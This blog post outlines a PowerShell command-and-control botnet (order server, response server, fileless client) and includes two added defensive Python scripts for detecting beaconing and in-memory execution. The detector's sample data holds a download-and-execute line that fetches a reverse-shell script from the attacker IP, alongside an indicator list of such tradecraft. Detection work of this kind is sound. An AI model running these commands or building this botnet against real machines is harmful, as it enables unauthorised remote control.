
Saturday, July 31, 2021

Powershell Pentesting: Make your own Botnet [I]

Hi everyone, welcome to my first summer post. I hope that so far so good ;).


In this entry of my personal blog I'm going to explain how to make your own personal botnet using PowerShell on Windows operating system machines.

The architecture design of the proof of concept could be something like this:




As you can see in the previous image, the architecture contains a client side and a server side.

On the server side we find two different processes that run as services on the attacker machine:

1. Bot-server: this process orchestrates the instructions across the botnet.

    1.1 This server holds the bot files with the orders that the attacker is going to send over the TCP network, and it can work in two different modes:

        1.1.1 Single order: the server sends a single order to a specific bot-client.

        1.1.2 Broadcast order: the server sends one order to all the clients of the botnet at the same time.

2. Response-server: this process receives the responses from the client side, with file content or execution logs.

On the client side only one process runs, entirely in memory, without writing files to the operating system: following the fileless concept, everything is executed in memory.


TECHNOLOGIES:

1. Server side:

    1.1 Bot-server: Apache web server and plain text files

    1.2 Response-server: Python3 HTTP server

2. Client side:

    2.1 PowerShell script


HOW IT WORKS:


The execution sequence of our PoC botnet:

1. The bot-client connects to the bot-server over TCP using an HTTP request and asks for the next instruction to execute.

2. The bot-server provides the next instruction to the bot-client.

3. The bot-client executes the order and stores the response in local memory.

4. The bot-client sends the response, with attachments, to the response-server.
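From the defender's side, step 1 of this sequence is the observable part: the bot-client fetches its order file from the bot-server again and again, and on the web server that shows up as the same client IP requesting the same path at near-constant intervals. The following is an added example, not code from the post, that parses Apache combined-format access log lines and flags (ip, path) pairs whose request spacing is too regular to be a person. The log lines are constructed sample data; the order-file path and the User-Agent strings are assumptions, and only the client IP 10.0.2.3 is taken from the post.

```python
"""Detect periodic HTTP polling ("beaconing") in Apache access logs.

Added example for this post, not the author's code. The bot-client fetches
its order file at a fixed interval; on the bot-server that is the same
client IP hitting the same path with regular spacing. We parse Apache
combined-format lines and flag (ip, path) pairs whose inter-request gaps
have a low coefficient of variation (stdev / mean).
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log. Path and User-Agent values are assumptions.
SAMPLE_LOG = [
    # bot-client polling its order file roughly every 30 seconds
    '10.0.2.3 - - [31/Jul/2021:12:00:00 +0000] "GET /bot/10.0.2.3.txt HTTP/1.1" 200 58 "-" "WindowsPowerShell/5.1"',
    '10.0.2.3 - - [31/Jul/2021:12:00:30 +0000] "GET /bot/10.0.2.3.txt HTTP/1.1" 200 58 "-" "WindowsPowerShell/5.1"',
    '10.0.2.3 - - [31/Jul/2021:12:01:01 +0000] "GET /bot/10.0.2.3.txt HTTP/1.1" 200 58 "-" "WindowsPowerShell/5.1"',
    '10.0.2.3 - - [31/Jul/2021:12:01:31 +0000] "GET /bot/10.0.2.3.txt HTTP/1.1" 200 58 "-" "WindowsPowerShell/5.1"',
    '10.0.2.3 - - [31/Jul/2021:12:02:00 +0000] "GET /bot/10.0.2.3.txt HTTP/1.1" 200 58 "-" "WindowsPowerShell/5.1"',
    '10.0.2.3 - - [31/Jul/2021:12:02:30 +0000] "GET /bot/10.0.2.3.txt HTTP/1.1" 200 58 "-" "WindowsPowerShell/5.1"',
    # a person browsing the same server at irregular times
    '10.0.2.50 - - [31/Jul/2021:12:00:05 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '10.0.2.50 - - [31/Jul/2021:12:00:12 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '10.0.2.50 - - [31/Jul/2021:12:03:40 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '10.0.2.50 - - [31/Jul/2021:12:04:01 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '10.0.2.50 - - [31/Jul/2021:12:09:15 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    # a line that is not in combined format and must be ignored
    "server restarted",
]


def parse_line(line):
    """Return (ip, path, datetime) for a combined-format line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FORMAT)
    return m.group("ip"), m.group("path"), ts


def find_beacons(lines, min_requests=5, max_cv=0.2):
    """Return {(ip, path): mean_gap_seconds} for clients that poll regularly.

    A pair is flagged when it has at least `min_requests` hits and the
    coefficient of variation of the gaps between consecutive hits is at
    most `max_cv`; human browsing has a much higher spread.
    """
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ip, path, ts = parsed
            hits[(ip, path)].append(ts)

    beacons = {}
    for key, stamps in hits.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            beacons[key] = round(mean, 1)
    return beacons


if __name__ == "__main__":
    for (ip, path), gap in find_beacons(SAMPLE_LOG).items():
        print(f"possible beacon: {ip} -> {path} every ~{gap}s")
```

Run it on a real access log with `find_beacons(open(path))`; the interesting tuning knobs are `min_requests` (how long you are willing to wait before alerting) and `max_cv` (how much jitter a client may add before it stops looking mechanical). A bot that sleeps a random 20 to 60 seconds between polls will still repeat the same path and status code hundreds of times a day, so path frequency per client is a useful second signal.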


ARCHITECTURE REVIEW OF THE SERVER SIDE

Bot-server structure




Server command example:

The previous instruction forces the client (10.0.2.3) to download a PowerShell .ps1 function (Invoke-powershellTCP.ps1), load the function into RAM and execute it in order to spawn an interactive shell to the attacker's machine (10.0.2.4):
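Because this stage never writes the .ps1 to disk, file-based antivirus has nothing to scan; what a defender does get is PowerShell Script Block Logging, which records the text of every block that runs as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log. The following added example, not code from the post, scores 4104 message bodies against a small set of download-and-execute indicators so that a benign `Invoke-WebRequest` to a JSON endpoint stays quiet while a download-then-invoke block from memory is flagged. The sample blocks are constructed; the script name and the attacker IP come from the post, and the weights and threshold are assumptions a team would tune.

```python
"""Flag in-memory download-and-execute patterns in PowerShell script block logs.

Added example for this post, not the author's code. With Script Block
Logging enabled, Event ID 4104 carries the script text as it executed, so
the "fileless" download-and-run stage is visible in the event log even
though nothing is written to disk. Each indicator below is a regex with a
weight; a block whose matched weights reach the threshold is reported.
"""
import re

# (name, pattern, weight). Case-insensitive because PowerShell is.
INDICATORS = [
    ("webclient",         re.compile(r"Net\.WebClient", re.I), 2),
    ("download_string",   re.compile(r"\.DownloadString\s*\(", re.I), 3),
    ("download_file",     re.compile(r"\.DownloadFile\s*\(", re.I), 2),
    ("invoke_webrequest", re.compile(r"Invoke-WebRequest|\biwr\b", re.I), 1),
    ("invoke_expression", re.compile(r"Invoke-Expression|\biex\b", re.I), 3),
    ("encoded_command",   re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("hidden_window",     re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1),
    ("remote_ps1",        re.compile(r"https?://\S+\.ps1", re.I), 2),
]

# Constructed sample 4104 message bodies. The first two are routine admin
# activity; the third is the download-and-run stage described in the post.
SAMPLE_BLOCKS = [
    "Get-Process | Where-Object { $_.CPU -gt 100 } | Sort-Object CPU -Descending",
    "Invoke-WebRequest -Uri https://example.invalid/status.json -OutFile C:\\Temp\\status.json",
    "IEX (New-Object Net.WebClient).DownloadString('http://10.0.2.4/Invoke-powershellTCP.ps1')",
]


def score_script_block(text):
    """Return (score, [matched indicator names]) for one 4104 message body."""
    matched = [name for name, rx, _ in INDICATORS if rx.search(text)]
    score = sum(weight for name, _, weight in INDICATORS if name in matched)
    return score, matched


def is_suspicious(text, threshold=5):
    """True when the indicator weights sum to at least `threshold`.

    A lone Invoke-WebRequest (weight 1) never trips it; a remote fetch
    combined with Invoke-Expression does.
    """
    return score_script_block(text)[0] >= threshold


def triage(messages, threshold=5):
    """Return [(index, score, matched)] for every suspicious message."""
    findings = []
    for i, text in enumerate(messages):
        score, matched = score_script_block(text)
        if score >= threshold:
            findings.append((i, score, matched))
    return findings


if __name__ == "__main__":
    for idx, score, matched in triage(SAMPLE_BLOCKS):
        print(f"block {idx}: score={score} indicators={','.join(matched)}")
```

The design choice worth noting is additive scoring rather than a single regex: `Net.WebClient` alone is used by plenty of legitimate scripts, and so is `Invoke-Expression`, but a block that fetches remote text and hands it straight to the interpreter is the combination this post relies on, and the weights make that combination cross the line while either half alone does not. Feed it real events by extracting the ScriptBlockText field from 4104 records; the enumeration index in `triage` is a stand-in for the event record id you would carry through to a ticket.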





The response-server source code in Python3:




Execution:




Stored log files:





ARCHITECTURE REVIEW OF THE CLIENT SIDE


Client-side PowerShell source code, initial version, botnet [I]:





POC EXECUTION:

1.0 Execute a single command from the server side on the client side





2.0 Spawn a cmd from the victim host to the attacker machine






3.0 Spawn a reverse PowerShell from the client side to the server side







And that is all for this session.

I hope this entry is interesting for you. Best regards,

f0ns11

